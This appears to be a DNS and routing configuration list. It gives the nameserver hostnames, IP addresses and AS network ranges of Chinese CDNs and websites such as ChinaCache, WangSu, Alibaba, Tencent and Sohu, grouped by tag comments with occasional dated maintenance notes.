59.39.31.41
125.64.131.2
118.123.112.40
# ewcache.com
ns1.ewcache.com
ns2.ewcache.com
ns3.ewcache.com
ns4.ewcache.com
60.28.161.158
60.28.183.99
115.238.226.71
122.228.218.36
59.39.31.40
180.153.116.245
# flxdns.com
dns1.flxdns.com
dns2.flxdns.com
dns3.flxdns.com
dns4.flxdns.com
dns5.flxdns.com
222.73.177.166
123.125.163.93
121.9.240.239
60.210.16.92
122.228.218.80
# globalcdn.cn
123.125.163.24
222.73.184.196
121.9.240.230
60.210.16.102
60.28.183.179
# dn-dns.com
dns2.dn-dns.com
dns3.dn-dns.com
dns4.dn-dns.com
# ttxshy.com
dns1.ttxshy.com
dns2.ttxshy.com
# gls.acadn.com
dns1.acadn.com
dns2.acadn.com
dns3.acadn.com
dns4.acadn.com
dns5.acadn.com
ns.acadn.com
122.11.50.159
203.110.169.43
58.67.161.27
61.155.106.90
111.161.19.62
61.153.108.34
121.11.70.131
# TAG: KuaiWang CDN
# hacdn.net
122.228.227.139
183.61.182.139
61.190.112.9
124.126.251.55
124.126.251.56
118.180.0.9
ns1.hacdn.net
ns2.hacdn.net
ns3.hacdn.net
ns4.hacdn.net
ns5.hacdn.net
ns6.hacdn.net
ns7.hacdn.net
ns8.hacdn.net
ns1.cloudtcp.net
ns2.cloudtcp.net
ns3.cloudtcp.net
ns4.cloudtcp.net
ns5.cloudtcp.net
ns6.cloudtcp.net
ns7.cloudtcp.net
ns8.cloudtcp.net
# hadns.net
ns1.hadns.net
ns2.hadns.net
ns3.hadns.net
ns4.hadns.net
ns5.hadns.net
ns6.hadns.net
ns7.hadns.net
ns8.hadns.net
# cachecn.com
ns1.cachecn.com
ns2.cachecn.com
ns3.cachecn.com
ns4.cachecn.com
ns5.cachecn.com
ns6.cachecn.com
ns7.cachecn.com
ns8.cachecn.com
# cloudcdn.net
ns1.sz-dns.net
ns2.sz-dns.net
ns3.sz-dns.net
ns4.sz-dns.net
ns5.sz-dns.net
ns6.sz-dns.net
# cloudglb.com
ns1.cloudglb.com
ns2.cloudglb.com
ns3.cloudglb.com
ns4.cloudglb.com
ns5.cloudglb.com
ns6.cloudglb.com
ns7.cloudglb.com
ns8.cloudglb.com
ns9.cloudglb.com
ns10.cloudglb.com
# ctycdn.net
ns1.ctycdn.net
ns2.ctycdn.net
ns3.ctycdn.net
ns4.ctycdn.net
# ctycdn.com
ns1.ctycdn.com
ns2.ctycdn.com
ns3.ctycdn.com
ns4.ctycdn.com
# fastweb.com.cn
# 此域名暂时无业务
# TAG: LanXun CDN
# All postfixes:
# ccgslb.com
# ccgslb.com.cn
# ccgslb.net
# chinacache.net
# speedupchinacache.net
# lxsvc.cn
# xgslb.net
# xgslb.com
# ccgslb.net
ns1.ccgslb.net
ns2.ccgslb.net
ns3.ccgslb.net
ns6.ccgslb.net
ns8.ccgslb.net
ns12.ccgslb.net
ns15.ccgslb.net
ns16.ccgslb.net
ns17.ccgslb.net
ns18.ccgslb.net
ns19.ccgslb.net
ns4.ccgslb.net
ns5.ccgslb.net
ns7.ccgslb.net
ns1.cnc.ccgslb.net
ns2.cnc.ccgslb.net
ns6.cnc.ccgslb.net
ns7.cnc.ccgslb.net
ns8.cnc.ccgslb.net
ns9.cnc.ccgslb.net
ns10.cnc.ccgslb.net
ns11.cnc.ccgslb.net
ns12.cnc.ccgslb.net
ns13.cnc.ccgslb.net
ns12.cnc.ccgslb.net
ns21.cnc.ccgslb.net
ns22.cnc.ccgslb.net
ns3.cnc.ccgslb.net
ns10.cnc.ccgslb.net
ns9.cnc.ccgslb.net
ns1.tel.ccgslb.net
ns2.tel.ccgslb.net
ns3.tel.ccgslb.net
ns5.tel.ccgslb.net
ns8.tel.ccgslb.net
ns9.tel.ccgslb.net
ns10.tel.ccgslb.net
ns11.tel.ccgslb.net
ns12.tel.ccgslb.net
ns13.tel.ccgslb.net
ns14.tel.ccgslb.net
ns15.tel.ccgslb.net
ns16.tel.ccgslb.net
ns17.tel.ccgslb.net
ns12.tel.ccgslb.net
ns13.tel.ccgslb.net
ns16.tel.ccgslb.net
ns18.tel.ccgslb.net
ns22.tel.ccgslb.net
ns21.tel.ccgslb.net
# ccgslb.com
ns2.ccgslb.com
ns7.ccgslb.com
ns8.ccgslb.com
ns9.ccgslb.com
ns14.ccgslb.com
ns15.ccgslb.com
ns17.ccgslb.com
# ccgslb.com.cn
ns1.ccgslb.com.cn
ns2.ccgslb.com.cn
ns4.ccgslb.com.cn
ns5.ccgslb.com.cn
ns6.ccgslb.com.cn
ns7.ccgslb.com.cn
ns12.ccgslb.com.cn
ns15.ccgslb.com.cn
ns16.ccgslb.com.cn
ns17.ccgslb.com.cn
ns19.ccgslb.com.cn
ns20.ccgslb.com.cn
ns21.ccgslb.com.cn
ns22.ccgslb.com.cn
ns23.ccgslb.com.cn
ns24.ccgslb.com.cn
ns25.ccgslb.com.cn
ns26.ccgslb.com.cn
ns1.cnc.ccgslb.com.cn
ns4.cnc.ccgslb.com.cn
ns5.cnc.ccgslb.com.cn
ns6.cnc.ccgslb.com.cn
ns7.cnc.ccgslb.com.cn
ns8.cnc.ccgslb.com.cn
ns9.cnc.ccgslb.com.cn
ns10.cnc.ccgslb.com.cn
ns11.cnc.ccgslb.com.cn
ns12.cnc.ccgslb.com.cn
ns13.cnc.ccgslb.com.cn
ns14.cnc.ccgslb.com.cn
ns15.cnc.ccgslb.com.cn
ns16.cnc.ccgslb.com.cn
ns17.cnc.ccgslb.com.cn
ns18.cnc.ccgslb.com.cn
ns19.cnc.ccgslb.com.cn
ns20.cnc.ccgslb.com.cn
ns21.cnc.ccgslb.com.cn
ns22.cnc.ccgslb.com.cn
ns23.cnc.ccgslb.com.cn
ns24.cnc.ccgslb.com.cn
ns25.cnc.ccgslb.com.cn
ns26.cnc.ccgslb.com.cn
ns27.cnc.ccgslb.com.cn
ns1.tel.ccgslb.com.cn
ns2.tel.ccgslb.com.cn
ns3.tel.ccgslb.com.cn
ns5.tel.ccgslb.com.cn
ns6.tel.ccgslb.com.cn
ns7.tel.ccgslb.com.cn
ns8.tel.ccgslb.com.cn
ns9.tel.ccgslb.com.cn
ns10.tel.ccgslb.com.cn
ns13.tel.ccgslb.com.cn
ns14.tel.ccgslb.com.cn
ns15.tel.ccgslb.com.cn
ns16.tel.ccgslb.com.cn
ns17.tel.ccgslb.com.cn
ns21.tel.ccgslb.com.cn
ns22.tel.ccgslb.com.cn
# chinacache.net
ns1.chinacache.net
ns2.chinacache.net
ns3.chinacache.net
ns4.chinacache.net
ns5.chinacache.net
ns6.chinacache.net
ns7.chinacache.net
ns8.chinacache.net
ns10.chinacache.net
ns12.chinacache.net
ns15.chinacache.net
ns16.chinacache.net
ns17.chinacache.net
ns18.chinacache.net
ns19.chinacache.net
ns21.chinacache.net
ns22.chinacache.net
ns23.chinacache.net
ns24.chinacache.net
ns100.chinacache.net
ns2.cnc.chinacache.net
ns3.cnc.chinacache.net
ns4.cnc.chinacache.net
ns1.cncssr.chinacache.net
ns2.cncssr.chinacache.net
ns3.cncssr.chinacache.net
ns4.cncssr.chinacache.net
ns5.cncssr.chinacache.net
ns6.cncssr.chinacache.net
ns7.cncssr.chinacache.net
ns9.cncssr.chinacache.net
ns11.cncssr.chinacache.net
ns12.cncssr.chinacache.net
ns13.cncssr.chinacache.net
ns14.cncssr.chinacache.net
ns15.cncssr.chinacache.net
ns16.cncssr.chinacache.net
ns17.cncssr.chinacache.net
ns19.cncssr.chinacache.net
ns20.cncssr.chinacache.net
ns21.cncssr.chinacache.net
ns22.cncssr.chinacache.net
ns23.cncssr.chinacache.net
ns24.cncssr.chinacache.net
ns1.tel.chinacache.net
ns2.tel.chinacache.net
ns3.tel.chinacache.net
ns1.telssr.chinacache.net
ns2.telssr.chinacache.net
ns4.telssr.chinacache.net
ns5.telssr.chinacache.net
ns6.telssr.chinacache.net
ns8.telssr.chinacache.net
ns9.telssr.chinacache.net
ns11.telssr.chinacache.net
ns12.telssr.chinacache.net
ns13.telssr.chinacache.net
ns14.telssr.chinacache.net
ns15.telssr.chinacache.net
ns16.telssr.chinacache.net
ns17.telssr.chinacache.net
ns18.telssr.chinacache.net
ns19.telssr.chinacache.net
# lxsvc.cn
ns1.lxsvc.cn
ns2.lxsvc.cn
ns3.lxsvc.cn
ns6.lxsvc.cn
ns7.lxsvc.cn
ns8.lxsvc.cn
# xgslb.net
ns1.xgslb.net
ns2.xgslb.net
ns3.xgslb.net
ns4.xgslb.net
nsx1.xgslb.net
nsx3.xgslb.net
# TAG: WangSu CDN
# lxdns.com
ns1.lxdns.com
ns2.lxdns.com
ns3.lxdns.com
ns4.lxdns.com
ns5.lxdns.com
n1.lxdns.com
n2.lxdns.com
n3.lxdns.com
n4.lxdns.com
n5.lxdns.com
dns1.speedcdns.info
dns2.speedcdns.info
dns3.speedcdns.info
dns4.speedcdns.info
dns5.speedcdns.info
# glb0.lxdns.com, 下面几个地址都是这个域名的DNS
# 125.78.241.150 # ns1.glb0.lxdns.com removed, 2013-01-18
220.162.97.201 # ns1.glb0.lxdns.com added, 2014-05-12
61.158.133.40 # ns2.glb0.lxdns.com
112.124.27.108 # ns3.glb0.lxdns.com
# 218.60.31.153 # ns4.glb0.lxdns.com removed, 2012-12-12
220.162.97.203 # ns4.glb0.lxdns.com added, 2012-05-12
125.39.1.116 # ns5.glb0.lxdns.com
175.25.171.11
222.163.201.17
125.39.1.113
111.202.74.156
220.162.97.202
139.209.90.42
183.131.210.112
111.202.74.154
218.76.105.64
60.220.197.11
222.218.45.170
221.202.204.227
113.107.112.205
115.231.20.69
222.163.201.19
111.202.74.147
180.97.178.220
113.107.112.236
221.202.204.232
150.138.173.201
113.107.57.72
14.215.100.33
14.215.93.35
60.223.235.133
113.107.57.68
222.186.18.62
61.158.133.42
113.107.57.70
125.39.1.117
115.231.84.171
115.231.87.249
58.220.6.137
ns1.glb0.lxdns.com
ns2.glb0.lxdns.com
ns3.glb0.lxdns.com
ns4.glb0.lxdns.com
ns5.glb0.lxdns.com
# image.suning.cn
gns2.zdnscloud.net.cn
gns1.zdnscloud.net
lns1.zdnscloud.info
lns2.zdnscloud.biz
# wscdns.com
ns1.wscdns.com
ns2.wscdns.com
ns3.wscdns.com
ns4.wscdns.com
ns5.wscdns.com
# wasu.cn
ns1.wasu.cn
ns2.wasu.cn
ns3.wasu.cn
ns4.wasu.cn
# lecloud.com
ns1.lecloud.com
ns2.lecloud.com
ns3.lecloud.com
ns4.lecloud.com
ns1.cdnle.com
ns2.cdnle.com
ns3.cdnle.com
ns4.cdnle.com
ns5.cdnle.com
# cdnle.com
123.126.32.220
106.38.226.228
115.182.200.243
119.147.182.213
119.188.180.227
# lsyun.net
123.59.126.241
123.125.36.248
36.110.223.246
124.95.177.14
115.238.243.244
# gslb.lecloud.com
123.125.36.245
123.59.126.242
36.110.223.99
ns1.gslb.coop.lecloud.com
ns2.gslb.coop.lecloud.com
ns3.gslb.coop.lecloud.com
ns4.gslb.coop.lecloud.com
ns5.gslb.coop.lecloud.com
ns6.gslb.coop.lecloud.com
ns7.gslb.coop.lecloud.com
ns8.gslb.coop.lecloud.com
ns1.gslb.lecloud.com
ns2.gslb.lecloud.com
dns1.ourglb0.info
dns2.ourglb0.info
dns3.ourglb0.info
dns4.ourglb0.info
dns1.ourglb0.org
dns2.ourglb0.org
dns3.ourglb0.org
# WangSu all NS IPs
114.114.116.138
106.38.250.143
107.155.17.59
107.155.21.130
107.155.29.130
110.53.182.78
111.12.13.162
111.20.128.227
111.23.12.40
111.40.216.74
111.47.198.137
111.7.175.135
112.253.2.205
112.25.85.9
112.29.134.75
112.5.61.115
113.13.30.116
113.207.31.202
113.207.37.131
113.6.235.243
113.6.248.75
114.80.216.202
115.231.223.11
116.114.17.101
116.55.253.141
117.131.199.67
117.139.22.76
117.145.178.171
117.169.17.201
117.23.59.51
1.180.238.212
119.254.210.112
1.193.152.82
119.84.53.202
120.41.38.67
122.143.7.211
122.143.7.212
122.70.129.50
123.134.184.140
123.138.255.133
123.59.102.14
123.59.102.18
124.126.250.69
124.14.10.99
124.239.189.5
125.17.240.6
125.39.59.20
125.64.98.17
139.209.92.72
14.18.201.81
150.138.141.86
153.36.201.18
163.177.115.100
171.15.197.95
1.82.232.14
183.131.160.178
183.131.64.216
183.2.219.210
183.245.146.21
183.61.63.115
203.19.33.30
218.60.32.77
218.65.177.15
220.170.181.136
220.194.215.143
221.13.157.138
221.180.139.195
221.195.4.26
221.204.210.203
222.161.223.148
222.175.136.91
222.186.137.228
222.222.207.140
223.111.12.58
223.99.236.180
39.130.133.34
42.202.143.195
42.236.123.142
42.247.12.197
58.211.21.41
58.218.206.10
58.222.16.23
58.252.187.172
58.51.95.181
59.46.7.41
59.53.70.198
60.12.124.141
60.221.222.10
61.156.196.70
61.164.246.21
61.184.203.23
61.190.149.200
65.153.158.131
65.153.158.196
65.153.196.131
# TAG: ksyunacc.com
120.131.7.211
120.131.7.212
120.92.128.233
120.92.128.234
# ksyuncdn.com
120.131.7.209
120.92.128.236
58.220.38.189
153.99.244.189
##### web sites #####
# TAG: alibaba-taobao
ns1.taobao.com
ns2.taobao.com
ns3.taobao.com
ns4.taobao.com
ns5.taobao.com
ns6.taobao.com
ns7.taobao.com
gslbns1.taobao.com
gslbns2.taobao.com
gslbns3.taobao.com
splitns1.taobao.com
splitns2.taobao.com
splitns3.taobao.com
danuoyins1.tbcache.com # img01.taobao.com
danuoyins2.tbcache.com
danuoyins3.tbcache.com
danuoyins4.tbcache.com.
danuoyins5.tbcache.com.
danuoyins8.tbcache.com.
danuoyins9.tbcache.com.
danuoyins6.tbcache.com.
danuoyins7.tbcache.com.
danuoyinewns1.gds.alicdn.com
danuoyinewns2.gds.alicdn.com
danuoyinewns3.gds.alicdn.com
danuoyinewns4.gds.alicdn.com
ns1.alikunlun.com
ns2.alikunlun.com
ns3.alikunlun.com
ns4.alikunlun.com
ns5.alikunlun.com
ns1.alikunlun.net
ns2.alikunlun.net
ns3.alikunlun.net
ns4.alikunlun.net
# ns1.alipaydns.com
# ns2.alipaydns.com
ns3.alipaydns.com
ns4.alipaydns.com
# ns5.alipaydns.com # 2012-10-26 14:32:19 = NXDOMAIN
# ns6.alipaydns.com # 2012-10-26 14:32:39 = NXDOMAIN
ns1.alipay.com
ns2.alipay.com
ns3.alipay.com
ns4.alipay.com
ns1.aliyun.com
ns2.aliyun.com
ns3.aliyun.com
ns4.aliyun.com
ns5.aliyun.com
ns1.alisoft.com
ns2.alisoft.com
# Same DNSs
# ns1.alisoft.com => gdns1.aliyun.com
# ns2.alisoft.com => gdns2.aliyun.com
gdns1.aliyun.com
gdns2.aliyun.com
ns1.aliedge.com
ns2.aliedge.com
ns3.aliedge.com
ns4.aliedge.com
gdsns1.alibabadns.com
gdsns2.alibabadns.com
cgsdns1.alibabaonline.com
cgsdns2.alibabaonline.com
ns8.alibabaonline.com
nshz.alibabaonline.com
nsp.alibabaonline.com
205.204.114.1 # nsp.alibabaonline.com 2001:470:20::2 才能解析到此地址
nsp2.alibabaonline.com
205.204.114.2 # nsp2.alibabaonline.com 2001:470:20::2 才能解析到此地址
tpdns1.alibabaonline.com
tpdns2.alibabaonline.com
tpdns3.alibabaonline.com
tpdns4.alibabaonline.com
ns1.koubei.com
ns2.koubei.com
ns3.koubei.com
ns4.koubei.com
ns1.alimama.com
ns2.alimama.com
nscm2.alimama.com
nscm3.alimama.com
nscm4.alimama.com
# hichinacdn.net 权威NS是ns[4-7].taobao.com, 可能是淘宝旗下的
ans1.hichinacdn.net
ans2.hichinacdn.net
ans3.hichinacdn.net
gslbns1.hichinacdn.net
gslbns2.hichinacdn.net
gslbns3.hichinacdn.net
# for cnspeedtest.cn
dns31.hichina.com
dns32.hichina.com
# in aliyun, bilibili.tv
ns1.hdslb.net
ns2.hdslb.net
ns3.hdslb.net
# TAG: CDNZZ
123.150.204.133
183.61.242.57
61.139.175.254
123.134.94.180
163.177.173.4
112.25.55.97
117.172.6.130
192.240.126.66
50.7.150.18
119.81.197.194
# TAG: alibaba-AS 37963
42.96.128.0/17
42.120.0.0/15
42.156.128.0/17
110.75.0.0/16
110.76.0.0/19
110.76.32.0/20
110.173.192.0/19
112.124.0.0/16
112.127.0.0/16
114.215.0.0/16
115.28.0.0/15
115.124.16.0/22
119.38.216.0/21
119.42.224.0/20
119.42.242.0/23
119.42.244.0/22
121.0.16.0/20
121.196.0.0/14
140.205.0.0/16
203.209.250.0/23
218.244.128.0/19
223.4.0.0/14
# TAG: 360safe
ns1.qhcdn.com
ns2.qhcdn.com
ns3.qhcdn.com
ns4.qhcdn.com
ns5.qhcdn.com
ns6.qhcdn.com
ns7.qhcdn.com
ns8.qhcdn.com
dns1.360safe.com
dns2.360safe.com
dns3.360safe.com
dns4.360safe.com
dns5.360safe.com
dns6.360safe.com
dns7.360safe.com
dns8.360safe.com
dns9.360safe.com
ns4.qhcdn.com
ns5.qhcdn.com
ns4.lbs.keniub.com
ns5.lbs.keniub.com
# TAG: cdnudns
ns1.cdnudns.com
ns2.cdnudns.com
ns3.cdnudns.com
ns4.cdnudns.com
# TAG: 7k7k.com, TestBy flash.7k7k.com
ns1.dnsv5.com
ns2.dnsv5.com
ns3.dnsv5.com
ns4.dnsv5.com
# TAG: bitautotech, 易车网
ns.bitautotech.com
ns5.bitautotech.com
ns8.bitautotech.com
ns7.bitautotech.com
# TAG: verycdn
183.60.42.126
220.170.193.203
218.205.72.133
121.9.213.152
58.51.95.122
58.253.211.37
59.151.30.18
59.45.79.34
111.13.125.151
112.21.182.4
112.65.227.196
124.128.20.102
222.140.154.137
221.204.173.206
183.203.21.76
58.215.241.24
183.232.66.233
220.167.100.213
211.151.81.135
123.129.249.141
ns1.veryns.com
ns3.veryns.com
ns4.veryns.com
ns7.veryns.com
ns8.veryns.com
ns1.ugametool.com
ns2.ugametool.com
# TAG: baidu
dns.baidu.com
ns2.baidu.com
ns3.baidu.com
ns4.baidu.com
ns7.baidu.com
ns1.a.shifen.com
ns2.a.shifen.com
ns3.a.shifen.com
ns4.a.shifen.com
ns5.a.shifen.com
ns1.n.shifen.com
ns2.n.shifen.com
ns3.n.shifen.com
ns4.n.shifen.com
ns5.n.shifen.com
# TAG: baidu-AS 38365
119.75.208.0/20
180.76.16.0/21
# TAG: CCTV-AS 55957
202.108.2.128/25
202.108.8.0/23
202.108.16.0/23
202.108.36.128/25
202.108.39.0/24
# TAG: cntv
gtm01.cctvcdn.net
gtm02.cctvcdn.net
gtm03.cctvcdn.net
# TAG: dnspod
a.dnspod.com
b.dnspod.com
c.dnspod.com
f1g1ns1.dnspod.net
f1g1ns2.dnspod.net
# f1g1ns3.dnspod.net
# f1g1ns4.dnspod.net
f1g2ns1.dnspod.net
f2g1ns1.dnspod.net
f2y1dns1.dnspod.net
f2y1dns2.dnspod.net
namerich1.dnspod.net
namerich2.dnspod.net
ns1.dnspod.com
ns2.dnspod.com
ns3.dnspod.com
ns4.dnspod.com
ns1.dnspod.net
ns2.dnspod.net
ns3.dnspod.net
ns4.dnspod.net
ns5.dnspod.net
ns6.dnspod.net
# for 51vv.com
ns1.dnsv2.com
ns2.dnsv2.com
ns1.dnsv3.com
ns2.dnsv3.com
ns1.dnsv4.com
ns2.dnsv4.com
ns1.dnsv5.com
ns2.dnsv5.com
ns3.dnsv2.com
ns4.dnsv2.com
ns3.dnsv3.com
ns4.dnsv3.com
ns3.dnsv4.com
ns4.dnsv4.com
ns3.dnsv5.com
ns4.dnsv5.com
182.140.167.128/25
125.39.213.128/25
115.236.151.128/25
183.60.57.128/25
180.153.10.128/25
ns1.mydnspod.com
ns2.mydnspod.com
# TAG: dopool.com, doplive.com
ns1.doplive.cn
ns2.doplive.cn
ns1.doplive.com
ns2.doplive.com
# TAG: hao123
ns1.jomodns.com
ns2.jomodns.com
ns3.jomodns.com
ns4.jomodns.com
ns5.jomodns.com
ns6.jomodns.com
ns7.jomodns.com
# TAG: imgo.tv
htns1.hifly.mobi
htns2.hifly.mobi
# TAG: iqiyi.com
ns1.iqiyi.com
ns2.iqiyi.com
ns3.iqiyi.com
ns4.iqiyi.com
ns5.iqiyi.com
ns6.iqiyi.com
202.108.14.0/24
220.181.74.0/24
# TAG: jd.com
ns1.jd.com
ns2.jd.com
ns3.jd.com
ns4.jd.com
ns1.jdcache.com
ns2.jdcache.com
ns3.jdcache.com
ns4.jdcache.com
ns.jdemall.com
ns1.jdemall.com
122.192.30.211
# TAG: kugou.com
ns.kugou.net
ns1.kugou.net
ns2.kugou.net
ns3.kugou.net
ns4.kugou.net
ns5.kugou.net
ns6.kugou.net
ns7.kugou.net
ns8.kugou.net
ns9.kugou.net
ns10.kugou.net
# TAG: kuwo.cn
ns1.koowo.com
ns2.koowo.com
ns3.koowo.com
ns4.koowo.com
# TAG: gitv.tv
ns1.ptqy.gitv.tv
ns2.ptqy.gitv.tv
ns3.ptqy.gitv.tv
ns4.ptqy.gitv.tv
ns1.c002.ottcn.com
ns2.c002.ottcn.com
ns3.c002.ottcn.com
ns4.c002.ottcn.com
ns1.ppstream.com
ns2.ppstream.com
ns3.ppstream.com
ns4.ppstream.com
106.38.235.227
106.38.235.228
61.135.177.195
61.135.177.196
# TAG: ShiJieYunTian
60.28.235.110
# TAG: yygslb.com
ns1.yygslb.com
ns2.yygslb.com
ns3.yygslb.com
ns4.yygslb.com
ns5.yygslb.com
ns6.yygslb.com
ns1.tbgslb.com
ns2.tbgslb.com
ns3.tbgslb.com
ns4.tbgslb.com
# TAG: scsdns.com
ns1.scsdns.com
ns2.scsdns.com
ns4.scsdns.com
ns6.scsdns.com
# TAG: letv
ns1.leletv.com # 123.126.33.193
ns2.leletv.com # 60.28.199.199
ns3.leletv.com # 220.181.153.119
ns4.leletv.com
ns5.leletv.com
ns6.leletv.com
ns7.letvcdn.com
ns8.letvcdn.com
ns1.letvcloud.com
ns2.letvcloud.com
ns1.letvgslb.com
ns2.letvgslb.com
ns7.letvimg.com
ns8.letvimg.com
ns1.letvstore.com
ns2.letvstore.com
120.52.40.98
14.152.52.77
124.95.176.54
183.131.24.19
222.184.96.46
123.138.84.137
182.118.127.41
120.52.40.97
106.38.226.73
106.38.226.74
111.206.210.90
111.206.210.91
107.155.49.64
65.255.32.176
107.155.56.64
# forward letvgslb.com to following 2 DNSs
123.125.89.132
220.181.117.92
# TAG: pconline
ns.pc.com.cn
ns2.pc.com.cn
# TAG: qingcdn
# v6.pstatp.com
125.39.7.140
218.92.225.204
14.215.106.4
222.133.239.200
114.114.116.138
1.193.152.70
14.18.201.81
23.248.160.251
36.248.9.18
42.202.143.73
42.247.12.197
58.218.206.10
58.222.16.23
58.252.187.174
58.51.95.181
59.46.7.41
59.53.70.198
59.56.18.209
60.221.222.10
61.136.118.107
61.156.196.70
61.190.149.196
106.38.238.57
107.155.29.130
110.53.182.78
111.1.61.178
111.12.13.162
111.23.12.40
111.40.216.74
111.47.198.137
111.62.5.13
111.7.175.135
112.25.85.9
112.253.2.211
112.29.134.75
112.5.61.115
113.207.31.208
113.207.37.131
113.229.252.20
113.6.235.243
113.6.248.75
114.54.2.138
114.80.216.202
115.231.223.11
116.114.17.101
116.55.253.141
117.131.199.67
117.135.199.242
117.139.22.76
117.169.17.205
117.23.1.17
117.23.59.51
118.123.12.205
119.254.210.112
119.84.53.202
120.41.38.70
122.188.107.12
122.70.129.50
123.132.254.201
123.138.255.132
123.159.203.10
123.159.203.7
123.59.102.18
124.126.250.69
124.14.10.99
124.239.189.8
125.39.59.20
125.64.98.17
125.90.58.142
139.209.92.72
150.138.141.86
153.36.201.18
161.202.38.26
163.177.115.100
171.15.197.95
182.118.9.2
183.131.160.178
183.131.64.216
183.2.219.210
183.203.28.121
183.232.237.3
183.61.63.115
218.60.32.77
218.61.21.202
218.65.177.15
218.92.225.201
220.170.181.136
220.194.215.143
221.180.136.198
221.204.210.203
222.161.223.148
222.175.136.91
222.186.137.228
222.222.192.70
223.99.236.180
# TAG: pptv_or_pplive
dns1.pplive.com
dns5.pplive.com
dns6.pplive.com
dns11.pplive.com
dns12.pplive.com
ns1.myxns.com.cn
ns2.myxns.com.cn
ns3.myxns.com.cn
ns4.myxns.com.cn
lv4ns1.ffdns.net
lv4ns2.ffdns.net
lv4ns3.ffdns.net
lv4ns4.ffdns.net
# TAG: ruijiang-AS 38372
# FoShan RuiJiang Science and Tech Ltd.
58.249.115.0/24
112.90.48.0/23
112.90.50.0/24
112.90.52.0/24
112.90.55.0/24
112.90.60.0/23
112.90.177.0/24
112.90.178.0/23
112.90.180.0/23
113.105.223.0/24
113.106.17.0/24
113.107.201.0/24
113.107.232.0/23
113.107.234.0/24
116.28.63.0/24
116.28.64.0/23
119.120.92.0/24
119.145.147.0/24
119.145.254.0/24
121.9.215.0/24
121.9.235.0/24
121.9.243.0/24
121.9.249.0/24
121.10.246.0/23
121.201.0.0/17
122.13.176.0/23
125.90.192.0/23
125.90.194.0/24
125.90.196.0/23
163.177.161.0/24
163.177.179.0/24
163.177.180.0/23
163.177.182.0/24
183.60.40.0/23
183.60.42.0/24
183.60.44.0/24
183.60.46.0/23
183.61.70.0/24
183.61.83.0/24
# TAG: xunlei
ns1.xunlei.net
ns2.xunlei.net
ns3.xunlei.net
ns4.xunlei.net
ns11.xunlei.net
ns22.xunlei.net
123.59.127.10
58.254.134.151
182.118.18.15
58.61.39.231
58.220.12.33
42.51.169.114
42.51.169.127
120.132.88.186
123.59.33.193
123.59.127.74
123.59.127.75
123.59.127.73
# TAG: sina
# small files' routing, from ZhuoQing
58.63.236.199
58.63.236.210
58.63.236.134
61.172.201.114
61.172.201.150
123.125.104.88
123.126.57.64
123.126.42.241
123.126.57.122
114.80.223.13
ns1.sina.com
ns2.sina.com
ns3.sina.com
ns4.sina.com
ns1.sina.com.cn
ns2.sina.com.cn
ns3.sina.com.cn
ns4.sina.com.cn
ns3.kunlunle.com
ns4.kunlunle.com
ns5.kunlunle.com
ns3.alikunlun.net
ns4.alikunlun.net
ns5.alikunlun.net
ns3.kunlunpi.com
ns4.kunlunpi.com
ns5.kunlunpi.com
ns3.kunlunno.com
ns4.kunlunno.com
ns5.kunlunno.com
ns3.kunlunea.com
ns4.kunlunea.com
ns5.kunlunea.com
ns1.sinaedge.com
ns2.sinaedge.com
ns3.sinaedge.com
ns4.sinaedge.com
ns5.sinaedge.com
ns4.kunlunca.com
# TAG: sohu, to BJ-DXT 118.244.253.0/25
# domains is here:
# 17173.com
# chinaren.com
# focus.cn
# go2map.com
# itc.cn
# sohu.com
# sogou.com
# sohu.com.cn
# sohu.net
# sohu.org
# ad-plus.cn
ns.sohu.cm # NOTE(review): ".cm" TLD -- likely a typo for "ns.sohu.com"; confirm before changing
dns.sohu.com
ns1.sohu.com
ns2.sohu.com
ns3.sohu.com
ns4.sohu.com
ns5.sohu.com
ns6.sohu.com
ns7.sohu.com
ns8.sohu.com
ns1.sogou.com
ns2.sogou.com
ns1.sohu-inc.com
ns2.sohu-inc.com
dns.sohu-inc.com
dns1.sohu-inc.com
ns1.sohucs.com
ns2.sohucs.com
ns3.sohucs.com
ns4.sohucs.com
ns5.sohucs.com
ns6.sohucs.com
ns7.sohucs.com
ns8.sohucs.com
ns1.sohuns.com
ns2.sohuns.com
w.a.sohu.com
s.a.sohu.com
k.a.sohu.com
v.a.sohu.com
x.a.sohu.com
y.a.sohu.com
z.a.sohu.com
ns1.e.sohu.com
ns2.e.sohu.com
# TAG: tencent
ns-os1.qq.com
ns-cmn1.qq.com
ns-cdn1.qq.com
ns-cdn2.qq.com
ns-edu1.qq.com
ns-edu2.qq.com
ns-cnc1.qq.com
ns-cnc2.qq.com
ns-tel1.qq.com
ns-tel2.qq.com
ns1.qq.com
ns2.qq.com
ns3.qq.com
ns4.qq.com
60.28.1.75 # ns4.qq.com 2001:470:20::2 才能解析到此地址
ns-open1.qq.com
ns-open2.qq.com
ns-open3.qq.com
ns114.qq.com
119.29.29.0/24
119.28.28.0/24
# TAG: tencent-AS 45090
# show route receive-protocol bgp 182.254.15.253
# show route receive-protocol bgp 220.112.88.133
182.254.0.0/16
203.195.128.0/17
203.205.128.0/17
# TAG: tudou
ns1.tudoudns.com
ns2.tudoudns.com
ns3.tudoudns.com
ns4.tudoudns.com
# TAG: shijieyuntian
dns1.vdndc.com
dns2.vdndc.com
dns3.vdndc.com
dns4.vdndc.com
dns5.vdndc.com
dns6.vdndc.com
# TAG: youku
ns1.youku.com
ns2.youku.com
ns3.youku.com
ns4.youku.com
# TAG: DouYu
119.90.48.99
119.90.48.98
124.14.7.243
##### IP address routes #####
# TAG: AS-9819
1.93.0.0/16
14.103.0.0/16
14.130.0.0/15
14.196.0.0/15
27.106.128.0/18
36.248.244.0/23
42.196.0.0/14
49.210.0.0/15
49.220.0.0/14
58.22.135.0/24
58.22.151.0/24
58.67.136.0/23
58.67.140.0/22
58.67.144.0/21
58.67.152.0/22
58.251.146.0/23
58.253.87.128/27
58.253.87.160/27
58.253.87.224/27
58.253.94.128/26
58.253.94.192/26
59.111.16.0/22
59.111.20.0/24
60.194.0.0/15
60.206.0.0/15
60.253.128.0/17
61.4.82.0/23
61.55.190.0/25
72.52.151.72/29
72.52.151.128/25
101.38.0.0/15
101.40.0.0/15
101.44.0.0/14
101.104.0.0/14
101.126.0.0/16
101.130.0.0/15
101.232.0.0/16
101.244.0.0/14
103.23.56.0/22
103.230.56.0/22
110.249.166.128/26
112.90.89.0/24
112.90.219.128/25
112.90.222.0/25
112.91.91.0/24
112.91.92.0/24
112.91.94.0/24
112.95.136.0/23
113.44.0.0/14
113.57.135.32/28
114.66.4.160/28
114.66.195.0/24
114.112.37.128/25
114.112.192.0/21
114.112.194.0/28
114.112.200.0/27
114.112.200.64/27
